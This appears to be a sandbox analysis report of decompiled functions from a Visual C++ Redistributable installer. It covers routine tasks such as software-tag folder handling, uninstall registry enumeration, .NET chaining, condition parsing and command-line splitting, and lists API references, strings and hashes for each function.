                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ee66
                                                                          0x0001ee6a
                                                                          0x0001eeb0
                                                                          0x0001eebc
                                                                          0x0001eebc
                                                                          0x0001eebd
                                                                          0x0001eec4
                                                                          0x0001eec8
                                                                          0x0001eecd
                                                                          0x0001eecd
                                                                          0x0001eed6
                                                                          0x0001eedb
                                                                          0x0001eedb
                                                                          0x0001eee4
                                                                          0x0001eee9
                                                                          0x0001eee9
                                                                          0x00000000
                                                                          0x0001eee4
                                                                          0x0001ee7d
                                                                          0x0001ee7f
                                                                          0x0001ee81
                                                                          0x0001eea9
                                                                          0x00000000
                                                                          0x0001eea9
                                                                          0x0001ee86
                                                                          0x0001ee8b
                                                                          0x0001ee90
                                                                          0x0001ee98
                                                                          0x0001ee99
                                                                          0x0001ee9c
                                                                          0x0001ee9e
                                                                          0x0001eea1
                                                                          0x0001eea5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001eea7
                                                                          0x0001eeb7
                                                                          0x00000000

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001EE4A
                                                                            • Part of subcall function 00054038: SetFileAttributesW.KERNEL32(00038FFA,00000080,00000000,00038FFA,000000FF,00000000,?,?,00038FFA), ref: 00054067
                                                                            • Part of subcall function 00054038: GetLastError.KERNEL32(?,?,00038FFA), ref: 00054071
                                                                            • Part of subcall function 00013B6A: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,0001EE95,00000001,00000000,00000095,00000001,000204DA,00000095,00000000,swidtag,00000001), ref: 00013B87
                                                                          Strings
                                                                          • Failed to allocate regid folder path., xrefs: 0001EEB0
                                                                          • Failed to format tag folder path., xrefs: 0001EEB7
                                                                          • swidtag, xrefs: 0001EE59
                                                                          • Failed to allocate regid file path., xrefs: 0001EEA9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesDirectoryErrorFileLastOpen@16Remove
                                                                          • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
                                                                          • API String ID: 1428973842-4170906717
                                                                          • Opcode ID: b2ce3fd2fbe273fc63581781cd49f39ae8c985d5ac4189e555f64dd55e5d8cd1
                                                                          • Instruction ID: dc54c4682d6bcd135f46195c42a2dd33aeaa0477c251a253a8323e8c875434c6
                                                                          • Opcode Fuzzy Hash: b2ce3fd2fbe273fc63581781cd49f39ae8c985d5ac4189e555f64dd55e5d8cd1
                                                                          • Instruction Fuzzy Hash: E5216D32D00518FBCB15EB99CC42ADEBBF5EF44711F14C0A6F914AA1A2D7319E909B50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00038B73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 69%
                                                                          			E00038B73(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t41;
				intOrPtr _t47;
				void* _t49;
				void* _t50;

				_t42 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t49 = E00050E3F((0 | _a4 != 0x00000000) + 0x80000001, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0x20019,  &_v12);
				if(_t49 == 0x80070003 || _t49 == 0x80070002) {
					L11:
					_t50 = 0;
				} else {
					if(_t49 >= 0) {
						_t41 = 0;
						_t50 = E00050D1C(_t42, _v12, 0,  &_v8);
						if(_t50 == 0x80070103) {
							goto L11;
						} else {
							_t47 = _a8;
							while(_t50 >= 0) {
								if(CompareStringW(0, 1, _v8, 0xffffffff,  *(_t47 + 0x10), 0xffffffff) != 2) {
									E000388CF(_t42, _a4, _v12, _v8, _t47, _a12);
								}
								_t41 = _t41 + 1;
								_t50 = E00050D1C(_t42, _v12, _t41,  &_v8);
								if(_t50 != 0x80070103) {
									continue;
								} else {
									goto L11;
								}
								goto L12;
							}
							_push("Failed to enumerate uninstall key for related bundles.");
							goto L4;
						}
					} else {
						_push("Failed to open uninstall registry key.");
						L4:
						_push(_t50);
						E0005012F();
					}
				}
				L12:
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _t50;
			}









                                                                          0x00038b73
                                                                          0x00038b76
                                                                          0x00038b77
                                                                          0x00038b78
                                                                          0x00038b7f
                                                                          0x00038ba4
                                                                          0x00038bac
                                                                          0x00038c2c
                                                                          0x00038c2c
                                                                          0x00038bb6
                                                                          0x00038bb8
                                                                          0x00038bcc
                                                                          0x00038bd8
                                                                          0x00038be0
                                                                          0x00000000
                                                                          0x00038be2
                                                                          0x00038be2
                                                                          0x00038be5
                                                                          0x00038c00
                                                                          0x00038c0f
                                                                          0x00038c0f
                                                                          0x00038c17
                                                                          0x00038c22
                                                                          0x00038c2a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00038c2a
                                                                          0x00038c56
                                                                          0x00000000
                                                                          0x00038c56
                                                                          0x00038bba
                                                                          0x00038bba
                                                                          0x00038bbf
                                                                          0x00038bbf
                                                                          0x00038bc0
                                                                          0x00038bc6
                                                                          0x00038bb8
                                                                          0x00038c2e
                                                                          0x00038c32
                                                                          0x00038c37
                                                                          0x00038c37
                                                                          0x00038c40
                                                                          0x00038c45
                                                                          0x00038c45
                                                                          0x00038c53

                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 00038BF7
                                                                          • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,0001F66B,00000001,00000100,000001B4,00000000), ref: 00038C45
                                                                          Strings
                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00038B94
                                                                          • Failed to enumerate uninstall key for related bundles., xrefs: 00038C56
                                                                          • Failed to open uninstall registry key., xrefs: 00038BBA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCompareOpenString
                                                                          • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 2817536665-2531018330
                                                                          • Opcode ID: 3f0bf89bd98be38d03d6b7306ef93666c32137fdedf2ff0f5d705b5f63a0f5da
                                                                          • Instruction ID: 5c3bdb3717d4bbfeb7368f666864eca59b4b6d1102c84d0dcee5f0d20d13652c
                                                                          • Opcode Fuzzy Hash: 3f0bf89bd98be38d03d6b7306ef93666c32137fdedf2ff0f5d705b5f63a0f5da
                                                                          • Instruction Fuzzy Hash: 5C219436911219BBDF226B94CC46FEEBA7DEB00361F2485A4F91066091DB751E90D7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003D047 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 31%
                                                                          			E0003D047(void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v20;
				signed int _t31;
				intOrPtr _t33;
				signed int _t45;
				signed int* _t46;
				signed int* _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int* _t53;
				intOrPtr _t54;

				_t53 = _a8;
				_t45 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t51 =  *_t53;
				_t49 = E000138D4(_t51 << 2, 1);
				_a8 = _t49;
				if(_t49 != 0) {
					_t31 = 0;
					if( *_t53 > 0) {
						_t4 =  &(_t53[1]); // 0x4
						_t46 = _t4;
						do {
							 *(_t49 + _t31 * 4) = _t46;
							_t31 = _t31 + 1;
							_t46 =  &(_t46[0x83]);
						} while (_t31 <  *_t53);
					}
					_v20 = 3;
					_v16 = 2;
					_v12 = _t51;
					_v8 = _t49;
					_t33 = _a12( &_v20, _a16);
					_t52 = _a4;
					_t54 = _t33;
					WaitForSingleObject( *(_t52 + 0xc), 0xffffffff);
					 *((intOrPtr*)( *((intOrPtr*)(_t52 + 0x10)) + 0x424)) = _t45;
					 *((intOrPtr*)( *((intOrPtr*)(_t52 + 0x10)) + 0x428)) = _t54;
					if(_t54 == 2) {
						 *((char*)( *((intOrPtr*)(_t52 + 0x10)) + 2)) = 1;
						 *((char*)( *((intOrPtr*)(_t52 + 0x10)) + 3)) = 1;
					}
					ReleaseMutex( *(_t52 + 0xc));
					SetEvent( *(_t52 + 8));
					E00013999(_a8);
				} else {
					_t45 = 0x8007000e;
					E000137D3(_t30, "NetFxChainer.cpp", 0xe4, 0x8007000e);
					_push("Failed to allocate buffer.");
					_push(0x8007000e);
					E0005012F();
				}
				return _t45;
			}
















                                                                          0x0003d04f
                                                                          0x0003d058
                                                                          0x0003d05a
                                                                          0x0003d05d
                                                                          0x0003d05e
                                                                          0x0003d05f
                                                                          0x0003d060
                                                                          0x0003d06d
                                                                          0x0003d06f
                                                                          0x0003d074
                                                                          0x0003d09d
                                                                          0x0003d0a1
                                                                          0x0003d0a3
                                                                          0x0003d0a3
                                                                          0x0003d0a6
                                                                          0x0003d0a6
                                                                          0x0003d0a9
                                                                          0x0003d0aa
                                                                          0x0003d0b0
                                                                          0x0003d0a6
                                                                          0x0003d0ba
                                                                          0x0003d0c2
                                                                          0x0003d0c9
                                                                          0x0003d0cc
                                                                          0x0003d0cf
                                                                          0x0003d0d2
                                                                          0x0003d0d5
                                                                          0x0003d0dc
                                                                          0x0003d0e5
                                                                          0x0003d0ee
                                                                          0x0003d0f7
                                                                          0x0003d0fc
                                                                          0x0003d103
                                                                          0x0003d103
                                                                          0x0003d10a
                                                                          0x0003d113
                                                                          0x0003d11c
                                                                          0x0003d076
                                                                          0x0003d076
                                                                          0x0003d086
                                                                          0x0003d08b
                                                                          0x0003d090
                                                                          0x0003d091
                                                                          0x0003d097
                                                                          0x0003d129

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0003D0DC
                                                                          • ReleaseMutex.KERNEL32(?), ref: 0003D10A
                                                                          • SetEvent.KERNEL32(?), ref: 0003D113
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                          • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                                          • API String ID: 944053411-3611226795
                                                                          • Opcode ID: 04f7ef6a1327119364b89511b06547097259b5f2c5d39dc911c86a1df473d6e9
                                                                          • Instruction ID: e51cb2424b2b41d4d59708693e213b327ebd95d824ec8c68caae7bba06f7c758
                                                                          • Opcode Fuzzy Hash: 04f7ef6a1327119364b89511b06547097259b5f2c5d39dc911c86a1df473d6e9
                                                                          • Instruction Fuzzy Hash: F821B5B5A0070ABFDB109F68DC45A9AB7F9FF08314F108629F924A7252C775E951CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000196F4 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 65%
                                                                          			E000196F4(void* __edx, void* __edi, int _a4, intOrPtr _a8) {
				void* _t12;
				void* _t19;
				void* _t22;
				int _t26;
				void* _t27;
				signed int _t28;
				void* _t33;
				void* _t34;
				void* _t37;

				_t33 = __edi;
				_t26 = _a4;
				_t12 =  *((intOrPtr*)(_t26 + 0x10)) - 0x10;
				if(_t12 == 0) {
					L8:
					_push(_t33);
					_t8 = _t26 + 0x18; // 0x18
					_t34 = _t8;
					E00031664(_a8, 0x18, _t34, 0x18);
					_t28 = 6;
					memset(_t34, 0, _t28 << 2);
					goto L9;
				} else {
					_t19 = _t12 - 1;
					if(_t19 == 0) {
						_t37 = E00017410(_t27, __edx,  *_t26,  *(_t26 + 0x18), _a8);
						if(_t37 == 0x80070490 || _t37 >= 0) {
							L9:
							_t37 = E00018E48(_t26);
							if(_t37 < 0) {
								_push("Failed to read next symbol.");
								goto L11;
							}
						} else {
							E000137D3(_t20, "condition.cpp", 0x1b8, _t37);
							_push("Failed to find variable.");
							L11:
							_push(_t37);
							E0005012F();
						}
					} else {
						_t22 = _t19 - 1;
						if(_t22 == 0) {
							goto L8;
						} else {
							_t23 = _t22 == 1;
							if(_t22 == 1) {
								goto L8;
							} else {
								_t37 = 0x8007000d;
								 *((intOrPtr*)(_t26 + 0x30)) = 1;
								E000137D3(_t23, "condition.cpp", 0x1c7, 0x8007000d);
								_push( *((intOrPtr*)(_t26 + 0x14)));
								E0005012F(0x8007000d, "Failed to parse condition \'%ls\' at position: %u",  *((intOrPtr*)(_t26 + 4)));
							}
						}
					}
				}
				return _t37;
			}












                                                                          0x000196f4
                                                                          0x000196f8
                                                                          0x000196ff
                                                                          0x00019702
                                                                          0x00019777
                                                                          0x00019777
                                                                          0x0001977a
                                                                          0x0001977a
                                                                          0x00019783
                                                                          0x0001978f
                                                                          0x00019790
                                                                          0x00000000
                                                                          0x00019704
                                                                          0x00019704
                                                                          0x00019707
                                                                          0x00019752
                                                                          0x0001975a
                                                                          0x00019793
                                                                          0x00019799
                                                                          0x0001979d
                                                                          0x0001979f
                                                                          0x00000000
                                                                          0x0001979f
                                                                          0x00019760
                                                                          0x0001976b
                                                                          0x00019770
                                                                          0x000197a4
                                                                          0x000197a4
                                                                          0x000197a5
                                                                          0x000197ab
                                                                          0x00019709
                                                                          0x00019709
                                                                          0x0001970c
                                                                          0x00000000
                                                                          0x0001970e
                                                                          0x0001970e
                                                                          0x00019711
                                                                          0x00000000
                                                                          0x00019713
                                                                          0x00019713
                                                                          0x00019718
                                                                          0x0001972a
                                                                          0x0001972f
                                                                          0x0001973b
                                                                          0x00019740
                                                                          0x00019711
                                                                          0x0001970c
                                                                          0x00019707
                                                                          0x000197b1

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: _memcpy_s
                                                                          • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
                                                                          • API String ID: 2001391462-1605196437
                                                                          • Opcode ID: 7d97afb78a2e4ecae0fbf6a8f7cffc06334ef0b0427030ea5ee9de41fe06da1e
                                                                          • Instruction ID: c48fdf60efd266aa0f6fd9dffdf53c6569a07c40cc5304fc683890a83b449c49
                                                                          • Opcode Fuzzy Hash: 7d97afb78a2e4ecae0fbf6a8f7cffc06334ef0b0427030ea5ee9de41fe06da1e
                                                                          • Instruction Fuzzy Hash: 2311E7326942207BDB652DA8DC9BEEF3A54DF05720F044066FE046E1D3C6A2D99482E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00058803 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69timeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 30%
                                                                          			E00058803(void* __edx, intOrPtr _a4, struct _FILETIME* _a8) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				signed short _t21;
				void* _t22;
				signed short _t24;
				struct _FILETIME* _t25;
				void* _t29;
				char* _t30;
				signed int _t38;

				_t29 = __edx;
				_t11 =  *0x7a008; // 0xfbf51acb
				_v8 = _t11 ^ _t38;
				_t30 =  &(_v24.wMonth);
				_t25 = _a8;
				_v24.wYear = 0;
				_t31 = 0;
				asm("stosd");
				_push(0);
				_v28 = 0x10;
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_push( &_v28);
				_push( &_v24);
				_push(0x4000000b);
				_push(_a4);
				if( *0x7a988() != 0) {
					if(SystemTimeToFileTime( &_v24, _t25) == 0) {
						_t21 = GetLastError();
						_t34 =  <=  ? _t21 : _t21 & 0x0000ffff | 0x80070000;
						_t22 = 0x80004005;
						_t31 =  >=  ? 0x80004005 :  <=  ? _t21 : _t21 & 0x0000ffff | 0x80070000;
						_push( >=  ? 0x80004005 :  <=  ? _t21 : _t21 & 0x0000ffff | 0x80070000);
						_push(0x37);
						goto L4;
					}
				} else {
					_t24 = GetLastError();
					_t37 =  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
					_t22 = 0x80004005;
					_t31 =  >=  ? 0x80004005 :  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
					_push( >=  ? 0x80004005 :  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000);
					_push(0x32);
					L4:
					_push("inetutil.cpp");
					E000137D3(_t22);
				}
				return E0003DE36(_t25, _v8 ^ _t38, _t29, _t30, _t31);
			}


















                                                                          0x00058803
                                                                          0x00058809
                                                                          0x00058810
                                                                          0x00058819
                                                                          0x0005881e
                                                                          0x00058821
                                                                          0x00058825
                                                                          0x00058827
                                                                          0x00058828
                                                                          0x00058829
                                                                          0x00058830
                                                                          0x00058831
                                                                          0x00058832
                                                                          0x00058837
                                                                          0x0005883b
                                                                          0x0005883c
                                                                          0x00058841
                                                                          0x0005884a
                                                                          0x0005887c
                                                                          0x0005887e
                                                                          0x0005888f
                                                                          0x00058892
                                                                          0x00058899
                                                                          0x0005889c
                                                                          0x0005889d
                                                                          0x00000000
                                                                          0x0005889d
                                                                          0x0005884c
                                                                          0x0005884c
                                                                          0x0005885d
                                                                          0x00058860
                                                                          0x00058867
                                                                          0x0005886a
                                                                          0x0005886b
                                                                          0x0005889f
                                                                          0x0005889f
                                                                          0x000588a4
                                                                          0x000588a4
                                                                          0x000588bb

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 0005884C
                                                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00058874
                                                                          • GetLastError.KERNEL32 ref: 0005887E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastTime$FileSystem
                                                                          • String ID: @Met$inetutil.cpp
                                                                          • API String ID: 1528435940-2500885081
                                                                          • Opcode ID: b4174fc6bcfd23c5b5f4d91f607a3016b973034c43bc13e6419db1eaeec785f9
                                                                          • Instruction ID: fb912c653d37e2a58041536a145bdcf8c63b8b4935b0657e1077c3cf8838a1e5
                                                                          • Opcode Fuzzy Hash: b4174fc6bcfd23c5b5f4d91f607a3016b973034c43bc13e6419db1eaeec785f9
                                                                          • Instruction Fuzzy Hash: A1118172A01229ABE7609AB98D44BFBB7ECEF48251F014526EE05F7150EA249D0487E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00019D03 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E00019D03(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				char _v16;
				void* _t32;
				char _t33;

				_t30 = _a4;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(E000171CF(_a8,  *((intOrPtr*)(_a4 + 0x14)),  &_v8, 0) >= 0) {
					_t32 = E00054932(_v8,  &_v12,  &_v16);
					if(_t32 == 0x80070002 || _t32 == 0x80070003) {
						_push(_v8);
						E0005061A(2, "File search: %ls, did not find path: %ls",  *_t30);
						_t33 = 0;
					} else {
						if(_t32 >= 0) {
							_t33 = E000181D8(_a8,  *((intOrPtr*)(_t30 + 4)), _v16, _v12, 0);
							if(_t33 < 0) {
								_push("Failed to set variable.");
								goto L2;
							}
						} else {
							_push("Failed get file version.");
							goto L2;
						}
					}
				} else {
					_push("Failed to format path string.");
					L2:
					_push(_t33);
					E0005012F();
				}
				E00012793(_v8);
				return _t33;
			}








                                                                          0x00019d0c
                                                                          0x00019d19
                                                                          0x00019d1f
                                                                          0x00019d22
                                                                          0x00019d2e
                                                                          0x00019d4f
                                                                          0x00019d57
                                                                          0x00019d8b
                                                                          0x00019d97
                                                                          0x00019d9f
                                                                          0x00019d61
                                                                          0x00019d63
                                                                          0x00019d7e
                                                                          0x00019d82
                                                                          0x00019d84
                                                                          0x00000000
                                                                          0x00019d84
                                                                          0x00019d65
                                                                          0x00019d65
                                                                          0x00000000
                                                                          0x00019d65
                                                                          0x00019d63
                                                                          0x00019d30
                                                                          0x00019d30
                                                                          0x00019d35
                                                                          0x00019d35
                                                                          0x00019d36
                                                                          0x00019d3c
                                                                          0x00019da4
                                                                          0x00019db1

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019D25
                                                                          Strings
                                                                          • Failed to set variable., xrefs: 00019D84
                                                                          • Failed to format path string., xrefs: 00019D30
                                                                          • File search: %ls, did not find path: %ls, xrefs: 00019D90
                                                                          • Failed get file version., xrefs: 00019D65
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16
                                                                          • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                                          • API String ID: 3613110473-2458530209
                                                                          • Opcode ID: ef1088b943102214b378eb189f2c509039359e3be7956f8283d7d18aa3217080
                                                                          • Instruction ID: f2e6b9e4d9ea4ab5aee242dc1ddd6869b7598d5d79cbbfb5d8c958e5fac9274e
                                                                          • Opcode Fuzzy Hash: ef1088b943102214b378eb189f2c509039359e3be7956f8283d7d18aa3217080
                                                                          • Instruction Fuzzy Hash: 5B118E76D4012DBACB126E94DD828EEBB79EF04351F104166FD046B112E6325EA49BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00011209 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00011209(void* __ecx, intOrPtr _a4, intOrPtr* _a8, short*** _a12) {
				int _v8;
				int _v12;
				PWCHAR* _t21;
				signed short _t24;
				void* _t35;

				_v8 = 0;
				_v12 = 0;
				_t35 = E00011EF2( &_v8, L"ignored ", 0);
				if(_t35 >= 0) {
					_t35 = E00011EF2( &_v8, _a4, 0);
					if(_t35 >= 0) {
						_t21 = CommandLineToArgvW(_v8,  &_v12);
						if(_t21 != 0) {
							_t8 =  &(_t21[1]); // 0x4
							 *_a12 = _t8;
							 *_a8 = _v12 - 1;
						} else {
							_t24 = GetLastError();
							_t39 =  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
							_t35 =  >=  ? 0x80004005 :  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "apputil.cpp", 0x63, _t35);
						}
					}
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t35;
			}








                                                                          0x0001121c
                                                                          0x0001121f
                                                                          0x00011227
                                                                          0x0001122b
                                                                          0x0001123a
                                                                          0x0001123e
                                                                          0x00011247
                                                                          0x0001124f
                                                                          0x0001127e
                                                                          0x00011284
                                                                          0x0001128d
                                                                          0x00011251
                                                                          0x00011251
                                                                          0x00011262
                                                                          0x0001126c
                                                                          0x00011277
                                                                          0x00011277
                                                                          0x0001124f
                                                                          0x0001123e
                                                                          0x00011292
                                                                          0x00011297
                                                                          0x00011297
                                                                          0x000112a3

                                                                          APIs
                                                                          • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00015137,00000000,?), ref: 00011247
                                                                          • GetLastError.KERNEL32(?,?,?,00015137,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00011251
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ArgvCommandErrorLastLine
                                                                          • String ID: @Met$apputil.cpp$ignored
                                                                          • API String ID: 3459693003-3465840003
                                                                          • Opcode ID: 2aac95ccb45d62da6ab0550c1bddf6f93f6b128cb89a1cd10e6479fdbaa8498f
                                                                          • Instruction ID: 827ae707ab1fc5e672aa8c488c71624b73cda7d82596220b721311a2033478a8
                                                                          • Opcode Fuzzy Hash: 2aac95ccb45d62da6ab0550c1bddf6f93f6b128cb89a1cd10e6479fdbaa8498f
